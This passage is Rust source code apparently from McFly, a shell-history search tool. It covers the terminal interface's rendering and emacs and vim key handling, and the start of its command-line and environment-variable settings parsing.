        self.build_cache_table();
        self.select();
        let command = self.input.command.to_owned();
        // A selection is only "real" if it contains a non-whitespace character.
        if command.chars().any(|c| !c.is_whitespace()) {
            self.history.record_selected_from_ui(
                &command,
                &self.settings.session_id,
                &self.settings.dir,
            );
            SelectionResult {
                run: self.run,
                selection: Some(command),
                // Remove delete_requests from the Interface, in case it's used to display() again.
                delete_requests: self.delete_requests.split_off(0),
            }
        } else {
            SelectionResult {
                run: self.run,
                selection: None,
                delete_requests: self.delete_requests.split_off(0),
            }
        }
    }
fn build_cache_table(&self) {
self.history.build_cache_table(
&self.settings.dir.to_owned(),
&Some(self.settings.session_id.to_owned()),
None,
None,
None,
self.settings.limit.to_owned(),
);
}
    /// Draw the one-line menu/info bar, unless menus are disabled in settings.
    fn menubar<W: Write>(&self, screen: &mut W) {
        if !self.settings.disable_menu {
            let (width, _height): (u16, u16) = terminal_size().unwrap();
            // `{text:width$}` left-pads the text to the full terminal width so
            // the mode's background color fills the whole bar.
            write!(
                screen,
                "{hide}{cursor}{clear}{fg}{bg}{text:width$}{reset_bg}",
                hide = cursor::Hide,
                fg = color::Fg(color::LightWhite),
                bg = self.menu_mode.bg(),
                cursor = cursor::Goto(1, self.info_line_index()),
                clear = clear::CurrentLine,
                text = self.menu_mode.text(self),
                reset_bg = color::Bg(color::Reset),
                width = width as usize
            )
            .unwrap();
            screen.flush().unwrap();
        }
    }
    /// Redraw the `$ <input>` prompt line and place the visible cursor at the
    /// input's current edit position.
    fn prompt<W: Write>(&self, screen: &mut W) {
        let prompt_line_index = self.prompt_line_index();
        write!(
            screen,
            "{}{}{}$ {}",
            if self.settings.lightmode {
                color::Fg(color::Black).to_string()
            } else {
                color::Fg(color::LightWhite).to_string()
            },
            cursor::Goto(1, self.prompt_line_index()),
            clear::CurrentLine,
            self.input
        )
        .unwrap();
        // +3 skips past the "$ " prefix (columns are 1-based).
        write!(
            screen,
            "{}{}",
            cursor::Goto(self.input.cursor as u16 + 3, prompt_line_index),
            cursor::Show
        )
        .unwrap();
        screen.flush().unwrap();
    }
    /// Park the (hidden) cursor just below the results area between redraws.
    fn debug_cursor<W: Write>(&self, screen: &mut W) {
        let result_top_index = self.result_top_index();
        // NOTE(review): termion's Goto coordinates are 1-based; column 0 here
        // may be unintended — confirm against termion's cursor docs.
        write!(
            screen,
            "{}{}",
            cursor::Hide,
            cursor::Goto(0, result_top_index + self.settings.results + 1)
        )
        .unwrap();
        screen.flush().unwrap();
    }
    /// Clear the screen and render every match, highlighting the selected row
    /// and right-aligning a compact "time since last run" column.
    fn results<W: Write>(&mut self, screen: &mut W) {
        let result_top_index = self.result_top_index();
        write!(
            screen,
            "{}{}{}",
            cursor::Hide,
            cursor::Goto(1, result_top_index),
            clear::All
        )
        .unwrap();
        let (width, _height): (u16, u16) = terminal_size().unwrap();
        // Clamp the selection if the match list shrank since the last redraw.
        if !self.matches.is_empty() && self.selection > self.matches.len() - 1 {
            self.selection = self.matches.len() - 1;
        }
        for (index, command) in self.matches.iter().enumerate() {
            // Base text / highlight / background colors per theme; the selected
            // row inverts them below.
            let mut fg = if self.settings.lightmode {
                color::Fg(color::Black).to_string()
            } else {
                color::Fg(color::LightWhite).to_string()
            };
            let mut highlight = if self.settings.lightmode {
                color::Fg(color::Blue).to_string()
            } else {
                color::Fg(color::Green).to_string()
            };
            let mut bg = color::Bg(color::Reset).to_string();
            if index == self.selection {
                if self.settings.lightmode {
                    fg = color::Fg(color::LightWhite).to_string();
                    bg = color::Bg(color::LightBlack).to_string();
                    highlight = color::Fg(color::White).to_string();
                } else {
                    fg = color::Fg(color::Black).to_string();
                    bg = color::Bg(color::LightWhite).to_string();
                    highlight = color::Fg(color::Green).to_string();
                }
            }
            write!(screen, "{}{}", fg, bg).unwrap();
            let command_line_index = self.command_line_index(index as i16);
            write!(
                screen,
                "{}{}",
                cursor::Goto(
                    1,
                    (command_line_index as i16 + result_top_index as i16) as u16
                ),
                Interface::truncate_for_display(
                    command,
                    &self.input.command,
                    width,
                    highlight,
                    fg,
                    self.debug
                )
            )
            .unwrap();
            if command.last_run.is_some() {
                // Right-aligned 9-char column at the end of the row.
                write!(
                    screen,
                    "{}",
                    cursor::Goto(
                        width - 9,
                        (command_line_index as i16 + result_top_index as i16) as u16
                    )
                )
                .unwrap();
                // humantime output like "2 days 3 hours" → first two words,
                // abbreviated ("2d 3h"); plural forms must be replaced before
                // singular ones so "days" doesn't become "dys".
                let duration = &format_duration(
                    Duration::minutes(
                        Utc::now()
                            .signed_duration_since(Utc.timestamp(command.last_run.unwrap(), 0))
                            .num_minutes(),
                    )
                    .to_std()
                    .unwrap(),
                )
                .to_string()
                .split(' ')
                .take(2)
                .map(|s| {
                    s.replace("years", "y")
                        .replace("year", "y")
                        .replace("months", "mo")
                        .replace("month", "mo")
                        .replace("days", "d")
                        .replace("day", "d")
                        .replace("hours", "h")
                        .replace("hour", "h")
                        .replace("minutes", "m")
                        .replace("minute", "m")
                        .replace("0s", "< 1m")
                })
                .collect::<Vec<String>>()
                .join(" ");
                let highlight = if self.settings.lightmode {
                    color::Fg(color::Blue).to_string()
                } else {
                    color::Fg(color::LightBlue).to_string()
                };
                write!(screen, "{}", highlight).unwrap();
                write!(screen, "{:>9}", duration).unwrap();
            }
            write!(screen, "{}", color::Bg(color::Reset)).unwrap();
            write!(screen, "{}", color::Fg(color::Reset)).unwrap();
        }
        screen.flush().unwrap();
    }
    /// Development helper: print `s` on terminal row 2, overwriting that line.
    #[allow(unused)]
    fn debug<W: Write, S: Into<String>>(&self, screen: &mut W, s: S) {
        write!(
            screen,
            "{}{}{}",
            cursor::Goto(1, 2),
            clear::CurrentLine,
            s.into()
        )
        .unwrap();
        screen.flush().unwrap();
    }
fn move_selection(&mut self, direction: MoveSelection) {
if self.is_screen_view_bottom() {
match direction {
MoveSelection::Up => {
self.selection += 1;
}
MoveSelection::Down => {
if self.selection > 0 {
self.selection -= 1;
}
}
}
} else {
match direction {
MoveSelection::Up => {
if self.selection > 0 {
self.selection -= 1;
}
}
MoveSelection::Down => {
self.selection += 1;
}
}
}
}
fn accept_selection(&mut self) {
if !self.matches.is_empty() {
self.input.set(&self.matches[self.selection].cmd);
}
}
fn confirm(&mut self, confirmation: bool) {
if confirmation {
if let MenuMode::ConfirmDelete = self.menu_mode {
self.delete_selection()
}
}
self.menu_mode = MenuMode::Normal;
}
    /// Delete the highlighted command from shell history, remember it for the
    /// caller (so the shell's own history can be scrubbed), and refresh.
    fn delete_selection(&mut self) {
        if !self.matches.is_empty() {
            // Inner scope ends the borrow of `self.matches` before the
            // mutable calls below.
            {
                let command = &self.matches[self.selection];
                history_cleaner::clean(self.settings, self.history, &command.cmd);
                self.delete_requests.push(command.cmd.clone());
            }
            self.build_cache_table();
            self.refresh_matches();
        }
    }
fn refresh_matches(&mut self) {
self.selection = 0;
self.matches = self.history.find_matches(
&self.input.command,
self.settings.results as i16,
self.settings.fuzzy,
&self.settings.result_sort,
);
}
    /// Main blocking UI loop: put the terminal in raw mode on an alternate
    /// screen, then redraw and dispatch each keypress until a key handler
    /// signals exit.
    fn select(&mut self) {
        let stdin = stdin();
        let mut screen = AlternateScreen::from(stdout().into_raw_mode().unwrap());
        // let mut screen = stdout().into_raw_mode().unwrap();
        write!(screen, "{}", clear::All).unwrap();
        self.refresh_matches();
        self.results(&mut screen);
        self.menubar(&mut screen);
        self.prompt(&mut screen);
        for c in stdin.keys() {
            self.debug_cursor(&mut screen);
            // A pending confirmation (e.g. delete) captures all keys until
            // answered or aborted.
            if self.menu_mode != MenuMode::Normal {
                match c.unwrap() {
                    Key::Ctrl('c')
                    | Key::Ctrl('d')
                    | Key::Ctrl('g')
                    | Key::Ctrl('z')
                    | Key::Ctrl('r') => {
                        self.run = false;
                        self.input.clear();
                        break;
                    }
                    Key::Char('y') | Key::Char('Y') => {
                        self.confirm(true);
                    }
                    Key::Char('n') | Key::Char('N') | Key::Esc => {
                        self.confirm(false);
                    }
                    _ => {}
                }
            } else {
                // Key-scheme handlers return true to end the loop.
                let early_out = match self.settings.key_scheme {
                    KeyScheme::Emacs => self.select_with_emacs_key_scheme(c.unwrap()),
                    KeyScheme::Vim => self.select_with_vim_key_scheme(c.unwrap()),
                };
                if early_out {
                    break;
                }
            }
            self.results(&mut screen);
            self.menubar(&mut screen);
            self.prompt(&mut screen);
        }
        write!(screen, "{}{}", clear::All, cursor::Show).unwrap();
    }
    /// Handle one keypress under the Emacs key scheme.
    ///
    /// Returns `true` when the loop should exit: Enter accepts-and-runs,
    /// TAB accepts-for-editing, and Ctrl-C/G/Z, Esc, or Ctrl-R abort with a
    /// cleared input. Any edit to the query triggers `refresh_matches`.
    fn select_with_emacs_key_scheme(&mut self, k: Key) -> bool {
        match k {
            Key::Char('\n') | Key::Char('\r') | Key::Ctrl('j') => {
                self.run = true;
                self.accept_selection();
                return true;
            }
            Key::Char('\t') => {
                self.run = false;
                self.accept_selection();
                return true;
            }
            Key::Ctrl('c') | Key::Ctrl('g') | Key::Ctrl('z') | Key::Esc | Key::Ctrl('r') => {
                self.run = false;
                self.input.clear();
                return true;
            }
            Key::Ctrl('b') => self.input.move_cursor(Move::Backward),
            Key::Ctrl('f') => self.input.move_cursor(Move::Forward),
            Key::Ctrl('a') => self.input.move_cursor(Move::BOL),
            Key::Ctrl('e') => self.input.move_cursor(Move::EOL),
            // Alt-Backspace arrives as Alt('\x08') or Alt('\x7f') depending
            // on the terminal.
            Key::Ctrl('w') | Key::Alt('\x08') | Key::Alt('\x7f') => {
                self.input.delete(Move::BackwardWord);
                self.refresh_matches();
            }
            Key::Alt('d') => {
                self.input.delete(Move::ForwardWord);
                self.refresh_matches();
            }
            // Ctrl-V toggles the per-result ranking-feature debug display.
            Key::Ctrl('v') => {
                self.debug = !self.debug;
            }
            Key::Alt('b') => self.input.move_cursor(Move::BackwardWord),
            Key::Alt('f') => self.input.move_cursor(Move::ForwardWord),
            Key::Left => self.input.move_cursor(Move::Backward),
            Key::Right => self.input.move_cursor(Move::Forward),
            Key::Up | Key::PageUp | Key::Ctrl('p') => self.move_selection(MoveSelection::Up),
            Key::Down | Key::PageDown | Key::Ctrl('n') => self.move_selection(MoveSelection::Down),
            Key::Ctrl('k') => {
                self.input.delete(Move::EOL);
                self.refresh_matches();
            }
            Key::Ctrl('u') => {
                self.input.delete(Move::BOL);
                self.refresh_matches();
            }
            Key::Backspace | Key::Ctrl('h') => {
                self.input.delete(Move::Backward);
                self.refresh_matches();
            }
            Key::Delete | Key::Ctrl('d') => {
                self.input.delete(Move::Forward);
                self.refresh_matches();
            }
            Key::Home => self.input.move_cursor(Move::BOL),
            Key::End => self.input.move_cursor(Move::EOL),
            Key::Char(c) => {
                self.input.insert(c);
                self.refresh_matches();
            }
            // F2: delete the highlighted history entry, confirming first
            // unless the user opted out of confirmation.
            Key::F(2) => {
                if !self.matches.is_empty() {
                    if self.settings.delete_without_confirm {
                        self.delete_selection();
                    } else {
                        self.menu_mode = MenuMode::ConfirmDelete;
                    }
                }
            }
            _ => {}
        }
        false
    }
    /// Handle one keypress under the Vim key scheme, split by insert vs
    /// command mode (tracked in `self.in_vim_insert_mode`).
    ///
    /// Returns `true` when the loop should exit. In insert mode Esc switches
    /// to command mode; in command mode Esc (or `q`) aborts. Enter/TAB
    /// accept in both modes, with and without the run flag respectively.
    fn select_with_vim_key_scheme(&mut self, k: Key) -> bool {
        if self.in_vim_insert_mode {
            match k {
                Key::Char('\n') | Key::Char('\r') | Key::Ctrl('j') => {
                    self.run = true;
                    self.accept_selection();
                    return true;
                }
                Key::Char('\t') => {
                    self.run = false;
                    self.accept_selection();
                    return true;
                }
                Key::Ctrl('c') | Key::Ctrl('g') | Key::Ctrl('z') | Key::Ctrl('r') => {
                    self.run = false;
                    self.input.clear();
                    return true;
                }
                Key::Left => self.input.move_cursor(Move::Backward),
                Key::Right => self.input.move_cursor(Move::Forward),
                Key::Up | Key::PageUp | Key::Ctrl('u') | Key::Ctrl('p') => {
                    self.move_selection(MoveSelection::Up)
                }
                Key::Down | Key::PageDown | Key::Ctrl('d') | Key::Ctrl('n') => {
                    self.move_selection(MoveSelection::Down)
                }
                Key::Esc => self.in_vim_insert_mode = false,
                Key::Backspace => {
                    self.input.delete(Move::Backward);
                    self.refresh_matches();
                }
                Key::Delete => {
                    self.input.delete(Move::Forward);
                    self.refresh_matches();
                }
                Key::Home => self.input.move_cursor(Move::BOL),
                Key::End => self.input.move_cursor(Move::EOL),
                Key::Char(c) => {
                    self.input.insert(c);
                    self.refresh_matches();
                }
                Key::F(2) => {
                    if !self.matches.is_empty() {
                        if self.settings.delete_without_confirm {
                            self.delete_selection();
                        } else {
                            self.menu_mode = MenuMode::ConfirmDelete;
                        }
                    }
                }
                _ => {}
            }
        } else {
            // Command mode: hjkl motion, w/b/e word motion, 0/^/$ line
            // motion, x delete, i/a re-enter insert mode.
            match k {
                Key::Char('\n') | Key::Char('\r') | Key::Ctrl('j') => {
                    self.run = true;
                    self.accept_selection();
                    return true;
                }
                Key::Char('\t') => {
                    self.run = false;
                    self.accept_selection();
                    return true;
                }
                Key::Ctrl('c')
                | Key::Ctrl('g')
                | Key::Ctrl('z')
                | Key::Esc
                | Key::Char('q')
                // TODO add ZZ as shortcut
                | Key::Ctrl('r') => {
                    self.run = false;
                    self.input.clear();
                    return true;
                }
                Key::Left | Key::Char('h') => self.input.move_cursor(Move::Backward),
                Key::Right | Key::Char('l') => self.input.move_cursor(Move::Forward),
                Key::Up | Key::PageUp | Key::Char('k') | Key::Ctrl('u') => self.move_selection(MoveSelection::Up),
                Key::Down | Key::PageDown | Key::Char('j') | Key::Ctrl('d') => self.move_selection(MoveSelection::Down),
                Key::Char('b') | Key::Char('e') => self.input.move_cursor(Move::BackwardWord),
                Key::Char('w') => self.input.move_cursor(Move::ForwardWord),
                Key::Char('0') | Key::Char('^') => self.input.move_cursor(Move::BOL),
                Key::Char('$') => self.input.move_cursor(Move::EOL),
                Key::Char('i') | Key::Char('a') => self.in_vim_insert_mode = true,
                Key::Backspace => {
                    self.input.delete(Move::Backward);
                    self.refresh_matches();
                }
                Key::Delete | Key::Char('x') => {
                    self.input.delete(Move::Forward);
                    self.refresh_matches();
                }
                Key::Home => self.input.move_cursor(Move::BOL),
                Key::End => self.input.move_cursor(Move::EOL),
                // Other printable characters are ignored in command mode.
                Key::Char(_c) => {
                }
                Key::F(2) => {
                    if !self.matches.is_empty() {
                        if self.settings.delete_without_confirm {
                            self.delete_selection();
                        }else{
                            self.menu_mode = MenuMode::ConfirmDelete;
                        }
                    }
                }
                _ => {}
            }
        }
        false
    }
/// Render `command` as a single results row, truncated to fit `width`.
///
/// When `search` is non-empty, the byte ranges recorded in
/// `command.match_bounds` are wrapped in `highlight_color` … `base_color`
/// so matched substrings stand out. When `debug` is true, the ranking
/// features for the command are appended after the command text.
fn truncate_for_display(
    command: &Command,
    search: &str,
    width: u16,
    highlight_color: String,
    base_color: String,
    debug: bool,
) -> String {
    // End of the last match range already copied into `out`.
    let mut prev: usize = 0;
    // Extra columns reserved on the right for the debug feature dump.
    let debug_space = if debug { 90 } else { 0 };
    // 9 columns are reserved for row chrome; fall back to a tiny fixed
    // width when the terminal is narrower than the debug reserve
    // (avoids an unsigned underflow in `width - debug_space - 9`).
    let max_grapheme_length = if width > debug_space {
        width - debug_space - 9
    } else {
        11
    };
    let mut out = FixedLengthGraphemeString::empty(max_grapheme_length);
    if !search.is_empty() {
        for (start, end) in &command.match_bounds {
            // Copy the unhighlighted gap before this match, then the
            // highlighted match itself, then restore the base color.
            if prev != *start {
                out.push_grapheme_str(&command.cmd[prev..*start]);
            }
            out.push_str(&highlight_color);
            out.push_grapheme_str(&command.cmd[*start..*end]);
            out.push_str(&base_color);
            prev = *end;
        }
    }
    // Copy whatever follows the final match (or the whole command when
    // there was no search / no matches).
    if prev != command.cmd.len() {
        out.push_grapheme_str(&command.cmd[prev..]);
    }
    if debug {
        // Widen the buffer so the feature dump isn't truncated away.
        out.max_grapheme_length += debug_space;
        out.push_grapheme_str(" ");
        out.push_str(&format!("{}", color::Fg(color::LightBlue)));
        out.push_grapheme_str(format!("rnk: {:.*} ", 2, command.rank));
        out.push_grapheme_str(format!("age: {:.*} ", 2, command.features.age_factor));
        out.push_grapheme_str(format!("lng: {:.*} ", 2, command.features.length_factor));
        out.push_grapheme_str(format!("ext: {:.*} ", 0, command.features.exit_factor));
        out.push_grapheme_str(format!(
            "r_ext: {:.*} ",
            0, command.features.recent_failure_factor
        ));
        out.push_grapheme_str(format!("dir: {:.*} ", 3, command.features.dir_factor));
        out.push_grapheme_str(format!(
            "s_dir: {:.*} ",
            3, command.features.selected_dir_factor
        ));
        out.push_grapheme_str(format!("ovlp: {:.*} ", 3, command.features.overlap_factor));
        out.push_grapheme_str(format!(
            "i_ovlp: {:.*} ",
            3, command.features.immediate_overlap_factor
        ));
        out.push_grapheme_str(format!(
            "occ: {:.*}",
            2, command.features.occurrences_factor
        ));
        out.push_grapheme_str(format!(
            "s_occ: {:.*} ",
            2, command.features.selected_occurrences_factor
        ));
        out.push_str(&base_color);
    }
    out.string
}
/// Row at which the results list starts, flipped when the UI is
/// anchored to the bottom of the screen.
fn result_top_index(&self) -> u16 {
    let (_width, height): (u16, u16) = terminal_size().unwrap();
    if self.is_screen_view_bottom() {
        height - RESULTS_TOP_INDEX
    } else {
        RESULTS_TOP_INDEX
    }
}
/// Row of the prompt line, flipped when the UI is anchored to the
/// bottom of the screen.
fn prompt_line_index(&self) -> u16 {
    let (_width, height): (u16, u16) = terminal_size().unwrap();
    if self.is_screen_view_bottom() {
        height - PROMPT_LINE_INDEX
    } else {
        PROMPT_LINE_INDEX
    }
}
/// Row of the info line: the very last terminal row in bottom view,
/// otherwise the fixed top position.
fn info_line_index(&self) -> u16 {
    let (_width, height): (u16, u16) = terminal_size().unwrap();
    if self.is_screen_view_bottom() {
        height
    } else {
        INFO_LINE_INDEX
    }
}
/// Mirror a result-row offset when the interface is drawn bottom-up.
fn command_line_index(&self, index: i16) -> i16 {
    match self.is_screen_view_bottom() {
        true => -index,
        false => index,
    }
}
/// True when the user configured the UI to hug the bottom of the screen.
fn is_screen_view_bottom(&self) -> bool {
    matches!(self.settings.interface_view, InterfaceView::Bottom)
}
}
// TODO:
// Ctrl('X') + Ctrl('U') => undo
// Ctrl('X') + Ctrl('G') => abort
// Meta('c') => capitalize word
// Meta('l') => downcase word
// Meta('t') => transpose words
// Meta('u') => upcase word
// Meta('y') => yank pop
// Ctrl('r') => reverse history search
// Ctrl('s') => forward history search
// Ctrl('t') => transpose characters
// Ctrl('q') | Ctrl('v') => quoted insert
// Ctrl('y') => yank
// Ctrl('_') => undo
<file_sep>/src/settings.rs
use crate::shell_history;
use clap::AppSettings;
use clap::{crate_authors, crate_version, value_t};
use clap::{App, Arg, SubCommand};
use dirs::home_dir;
use std::env;
use std::path::PathBuf;
use std::str::FromStr;
use std::time::SystemTime;
use std::time::UNIX_EPOCH;
/// Which McFly subcommand was invoked (set by `Settings::parse_args`).
#[derive(Debug)]
pub enum Mode {
    Add,
    Search,
    Train,
    Move,
    Init,
}
/// Key-binding flavor for the interactive UI (from `MCFLY_KEY_SCHEME`).
#[derive(Debug)]
pub enum KeyScheme {
    Emacs,
    Vim,
}
/// Shell targeted by `mcfly init` when emitting integration code.
#[derive(Debug)]
pub enum InitMode {
    Bash,
    Zsh,
    Fish,
}
/// Whether the UI is anchored to the top or bottom of the terminal
/// (from `MCFLY_INTERFACE_VIEW`).
#[derive(Debug, PartialEq)]
pub enum InterfaceView {
    Top,
    Bottom,
}
/// Ordering of search results (from `MCFLY_RESULTS_SORT`).
#[derive(Debug)]
pub enum ResultSort {
    Rank,
    LastRun,
}
/// On-disk layout of the shell history file McFly reads and appends to.
#[derive(Debug, Clone, Copy)]
pub enum HistoryFormat {
    /// bash format - commands in plain text, one per line, with multi-line commands joined.
    /// HISTTIMEFORMAT is assumed to be empty.
    Bash,
    /// zsh format - commands in plain text, with multiline commands on multiple lines.
    /// McFly does not currently handle joining these lines; they're treated as separate commands.
    /// If --zsh-extended-history was given, `extended_history` will be true, and we'll strip the
    /// timestamp from the beginning of each command.
    Zsh { extended_history: bool },
    /// fish's pseudo-yaml, with commands stored as 'cmd' with multiple lines joined into one with
    /// '\n', and with timestamps stored as 'when'. ('paths' is ignored.)
    /// (Some discussion of changing format: https://github.com/fish-shell/fish-shell/pull/6493)
    Fish,
}
/// Fully-resolved runtime configuration, built by `Settings::parse_args`
/// from CLI flags with environment-variable fallbacks.
#[derive(Debug)]
pub struct Settings {
    /// Subcommand being executed.
    pub mode: Mode,
    /// Show ranking-feature debug output in the UI.
    pub debug: bool,
    /// Fuzzy-match weight; 0 disables fuzzy matching.
    pub fuzzy: i16,
    /// Per-shell-session identifier (MCFLY_SESSION_ID).
    pub session_id: String,
    /// Path of the per-session history scratch file (MCFLY_HISTORY).
    pub mcfly_history: PathBuf,
    /// File to write the selection result to, if requested.
    pub output_selection: Option<String>,
    /// Command text being added or searched for.
    pub command: String,
    /// Directory the command ran in / is searched from.
    pub dir: String,
    /// Number of results to display.
    pub results: u16,
    /// Unix timestamp the command ran at (add mode).
    pub when_run: Option<i64>,
    /// Exit code of the command (add mode).
    pub exit_code: Option<i32>,
    /// $OLDPWD at the time the command ran, when known.
    pub old_dir: Option<String>,
    /// Also append new entries to $HISTFILE/$MCFLY_HISTFILE.
    pub append_to_histfile: bool,
    /// Rebuild the training cache (train mode).
    pub refresh_training_cache: bool,
    /// Use the light color scheme (MCFLY_LIGHT).
    pub lightmode: bool,
    /// Emacs- or vim-style key bindings.
    pub key_scheme: KeyScheme,
    /// Layout of the shell history file.
    pub history_format: HistoryFormat,
    /// Optional cap on history entries considered (MCFLY_HISTORY_LIMIT).
    pub limit: Option<i64>,
    /// Skip MCFLY_* environment validation (used by `init`).
    pub skip_environment_check: bool,
    /// Shell targeted by `mcfly init`.
    pub init_mode: InitMode,
    /// Delete history entries without a confirmation prompt.
    pub delete_without_confirm: bool,
    /// Anchor the UI to the top or bottom of the terminal.
    pub interface_view: InterfaceView,
    /// Result ordering.
    pub result_sort: ResultSort,
    /// Hide the help menu bar.
    pub disable_menu: bool,
}
impl Default for Settings {
    /// Baseline configuration used before CLI and environment parsing
    /// fill in real values: `add` mode, 10 results, emacs keys, bash
    /// history format, everything else empty or off. Fields are listed
    /// in struct-declaration order.
    fn default() -> Settings {
        Settings {
            mode: Mode::Add,
            debug: false,
            fuzzy: 0,
            session_id: String::new(),
            mcfly_history: PathBuf::new(),
            output_selection: None,
            command: String::new(),
            dir: String::new(),
            results: 10,
            when_run: None,
            exit_code: None,
            old_dir: None,
            append_to_histfile: false,
            refresh_training_cache: false,
            lightmode: false,
            key_scheme: KeyScheme::Emacs,
            history_format: HistoryFormat::Bash,
            limit: None,
            skip_environment_check: false,
            init_mode: InitMode::Bash,
            delete_without_confirm: false,
            interface_view: InterfaceView::Top,
            result_sort: ResultSort::Rank,
            disable_menu: false,
        }
    }
}
impl Settings {
/// Parse the process command line into a fully-populated `Settings`.
///
/// Clap arguments take precedence; anything not given explicitly falls
/// back to `MCFLY_*` environment variables. Panics with a
/// `McFly error:` message when required context is missing, except when
/// the `init` subcommand is used (shell integration has not exported
/// the session variables yet at that point).
pub fn parse_args() -> Settings {
    let matches = App::new("McFly")
        .version(crate_version!())
        .author(crate_authors!())
        .about("Fly through your shell history")
        .setting(AppSettings::SubcommandRequiredElseHelp)
        .arg(Arg::with_name("debug")
            .short("d")
            .long("debug")
            .help("Debug"))
        .arg(Arg::with_name("session_id")
            .long("session_id")
            .help("Session ID to record or search under (defaults to $MCFLY_SESSION_ID)")
            .value_name("SESSION_ID")
            .takes_value(true))
        .arg(Arg::with_name("mcfly_history")
            .long("mcfly_history")
            .help("Shell history file to read from when adding or searching (defaults to $MCFLY_HISTORY)")
            .value_name("MCFLY_HISTORY")
            .takes_value(true))
        .arg(Arg::with_name("history_format")
            .long("history_format")
            .help("Shell history file format, 'bash', 'zsh', 'zsh-extended' or 'fish' (defaults to 'bash')")
            .value_name("FORMAT")
            .takes_value(true))
        .subcommand(SubCommand::with_name("add")
            .about("Add commands to the history")
            .aliases(&["a"])
            .arg(Arg::with_name("exit")
                .short("e")
                .long("exit")
                .value_name("EXIT_CODE")
                .help("Exit code of command")
                .takes_value(true))
            .arg(Arg::with_name("append_to_histfile")
                .long("append-to-histfile")
                .help("Also append new history to $HISTFILE/$MCFLY_HISTFILE (e.q., .bash_history)"))
            .arg(Arg::with_name("when")
                .short("w")
                .long("when")
                .value_name("UNIX_EPOCH")
                .help("The time that the command was run (default now)")
                .takes_value(true))
            .arg(Arg::with_name("directory")
                .short("d")
                .long("dir")
                .value_name("PATH")
                .help("Directory where command was run (default $PWD)")
                .takes_value(true))
            .arg(Arg::with_name("old_directory")
                .short("o")
                .long("old-dir")
                .value_name("PATH")
                .help("The previous directory the user was in before running the command (default $OLDPWD)")
                .takes_value(true))
            .arg(Arg::with_name("command")
                .help("The command that was run (default last line of $MCFLY_HISTORY file)")
                .value_name("COMMAND")
                .multiple(true)
                .required(false)
                .index(1)))
        .subcommand(SubCommand::with_name("search")
            .about("Search the history")
            .aliases(&["s"])
            .arg(Arg::with_name("directory")
                .short("d")
                .long("dir")
                .value_name("PATH")
                .help("Directory where command was run")
                .takes_value(true))
            .arg(Arg::with_name("results")
                .short("r")
                .long("results")
                .value_name("NUMBER")
                .help("Number of results to return")
                .takes_value(true))
            .arg(Arg::with_name("fuzzy")
                .short("f")
                .long("fuzzy")
                .help("Fuzzy-find results. 0 is off; higher numbers weight shorter/earlier matches more. Try 2"))
            .arg(Arg::with_name("delete_without_confirm")
                .long("delete_without_confirm")
                .help("Delete entry without confirm"))
            .arg(Arg::with_name("output_selection")
                .short("o")
                .long("output-selection")
                .value_name("PATH")
                .help("Write results to file, including selection mode, new commandline, and any shell-specific requests")
                .takes_value(true))
            .arg(Arg::with_name("command")
                .help("The command search term(s)")
                .value_name("COMMAND")
                .multiple(true)
                .required(false)
                .index(1)))
        .subcommand(SubCommand::with_name("move")
            .about("Record a directory having been moved; moves command records from the old path to the new one")
            .arg(Arg::with_name("old_dir_path")
                .help("The old directory path")
                .value_name("OLD_DIR_PATH")
                .multiple(false)
                .required(true)
                .index(1))
            .arg(Arg::with_name("new_dir_path")
                .help("The new directory path")
                .value_name("NEW_DIR_PATH")
                .multiple(false)
                .required(true)
                .index(2)))
        .subcommand(SubCommand::with_name("train")
            .about("Train the suggestion engine (developer tool)")
            .arg(Arg::with_name("refresh_cache")
                .short("r")
                .long("refresh_cache")
                .help("Directory where command was run")
                .required(false)))
        .subcommand(SubCommand::with_name("init")
            .about("Prints the shell code used to execute mcfly")
            .arg(Arg::with_name("shell")
                .help("Shell to init — one of bash, zsh, or fish")
                .possible_values(&["bash", "zsh", "fish"])
                .required(true))
        )
        .get_matches();

    let mut settings = Settings::default();

    // `mcfly init` runs before the shell integration has exported
    // MCFLY_SESSION_ID / MCFLY_HISTORY, so don't demand them below.
    if matches.is_present("init") {
        settings.skip_environment_check = true;
    }

    // Global options resolved from flags and/or environment.
    settings.debug = matches.is_present("debug") || env::var("MCFLY_DEBUG").is_ok();
    settings.limit = env::var("MCFLY_HISTORY_LIMIT")
        .ok()
        .and_then(|o| o.parse::<i64>().ok());
    settings.interface_view = match env::var("MCFLY_INTERFACE_VIEW") {
        Ok(val) => match val.as_str() {
            "TOP" => InterfaceView::Top,
            "BOTTOM" => InterfaceView::Bottom,
            _ => InterfaceView::Top,
        },
        _ => InterfaceView::Top,
    };
    settings.result_sort = match env::var("MCFLY_RESULTS_SORT") {
        Ok(val) => match val.as_str() {
            "RANK" => ResultSort::Rank,
            "LAST_RUN" => ResultSort::LastRun,
            _ => ResultSort::Rank,
        },
        _ => ResultSort::Rank,
    };
    settings.session_id = matches
        .value_of("session_id")
        .map(|s| s.to_string())
        .unwrap_or_else( ||
            env::var("MCFLY_SESSION_ID")
                .unwrap_or_else(|err| {
                    if !settings.skip_environment_check
                    {
                        panic!(
                        "McFly error: Please ensure that MCFLY_SESSION_ID contains a random session ID ({})",
                        err)
                    }
                    else {
                        std::string::String::new()
                    }
                }));
    settings.mcfly_history = PathBuf::from(
        matches
            .value_of("mcfly_history")
            .map(|s| s.to_string())
            .unwrap_or_else(|| {
                env::var("MCFLY_HISTORY").unwrap_or_else(|err| {
                    if !settings.skip_environment_check {
                        panic!(
                            "McFly error: Please ensure that MCFLY_HISTORY is set ({})",
                            err
                        )
                    } else {
                        std::string::String::new()
                    }
                })
            }),
    );
    settings.history_format = match matches.value_of("history_format") {
        None => HistoryFormat::Bash,
        Some("bash") => HistoryFormat::Bash,
        Some("zsh") => HistoryFormat::Zsh {
            extended_history: false,
        },
        Some("zsh-extended") => HistoryFormat::Zsh {
            extended_history: true,
        },
        Some("fish") => HistoryFormat::Fish,
        Some(format) => panic!("McFly error: unknown history format '{}'", format),
    };

    // Subcommand-specific options.
    match matches.subcommand() {
        ("add", Some(add_matches)) => {
            settings.mode = Mode::Add;
            // Default the run time to "now" when --when is absent/invalid.
            settings.when_run = Some(
                value_t!(add_matches, "when", i64).unwrap_or(
                    SystemTime::now()
                        .duration_since(UNIX_EPOCH)
                        .unwrap_or_else(|err| {
                            panic!("McFly error: Time went backwards ({})", err)
                        })
                        .as_secs() as i64,
                ),
            );
            settings.append_to_histfile = add_matches.is_present("append_to_histfile");
            if add_matches.value_of("exit").is_some() {
                settings.exit_code =
                    Some(value_t!(add_matches, "exit", i32).unwrap_or_else(|e| e.exit()));
            }
            if let Some(dir) = add_matches.value_of("directory") {
                settings.dir = dir.to_string();
            } else {
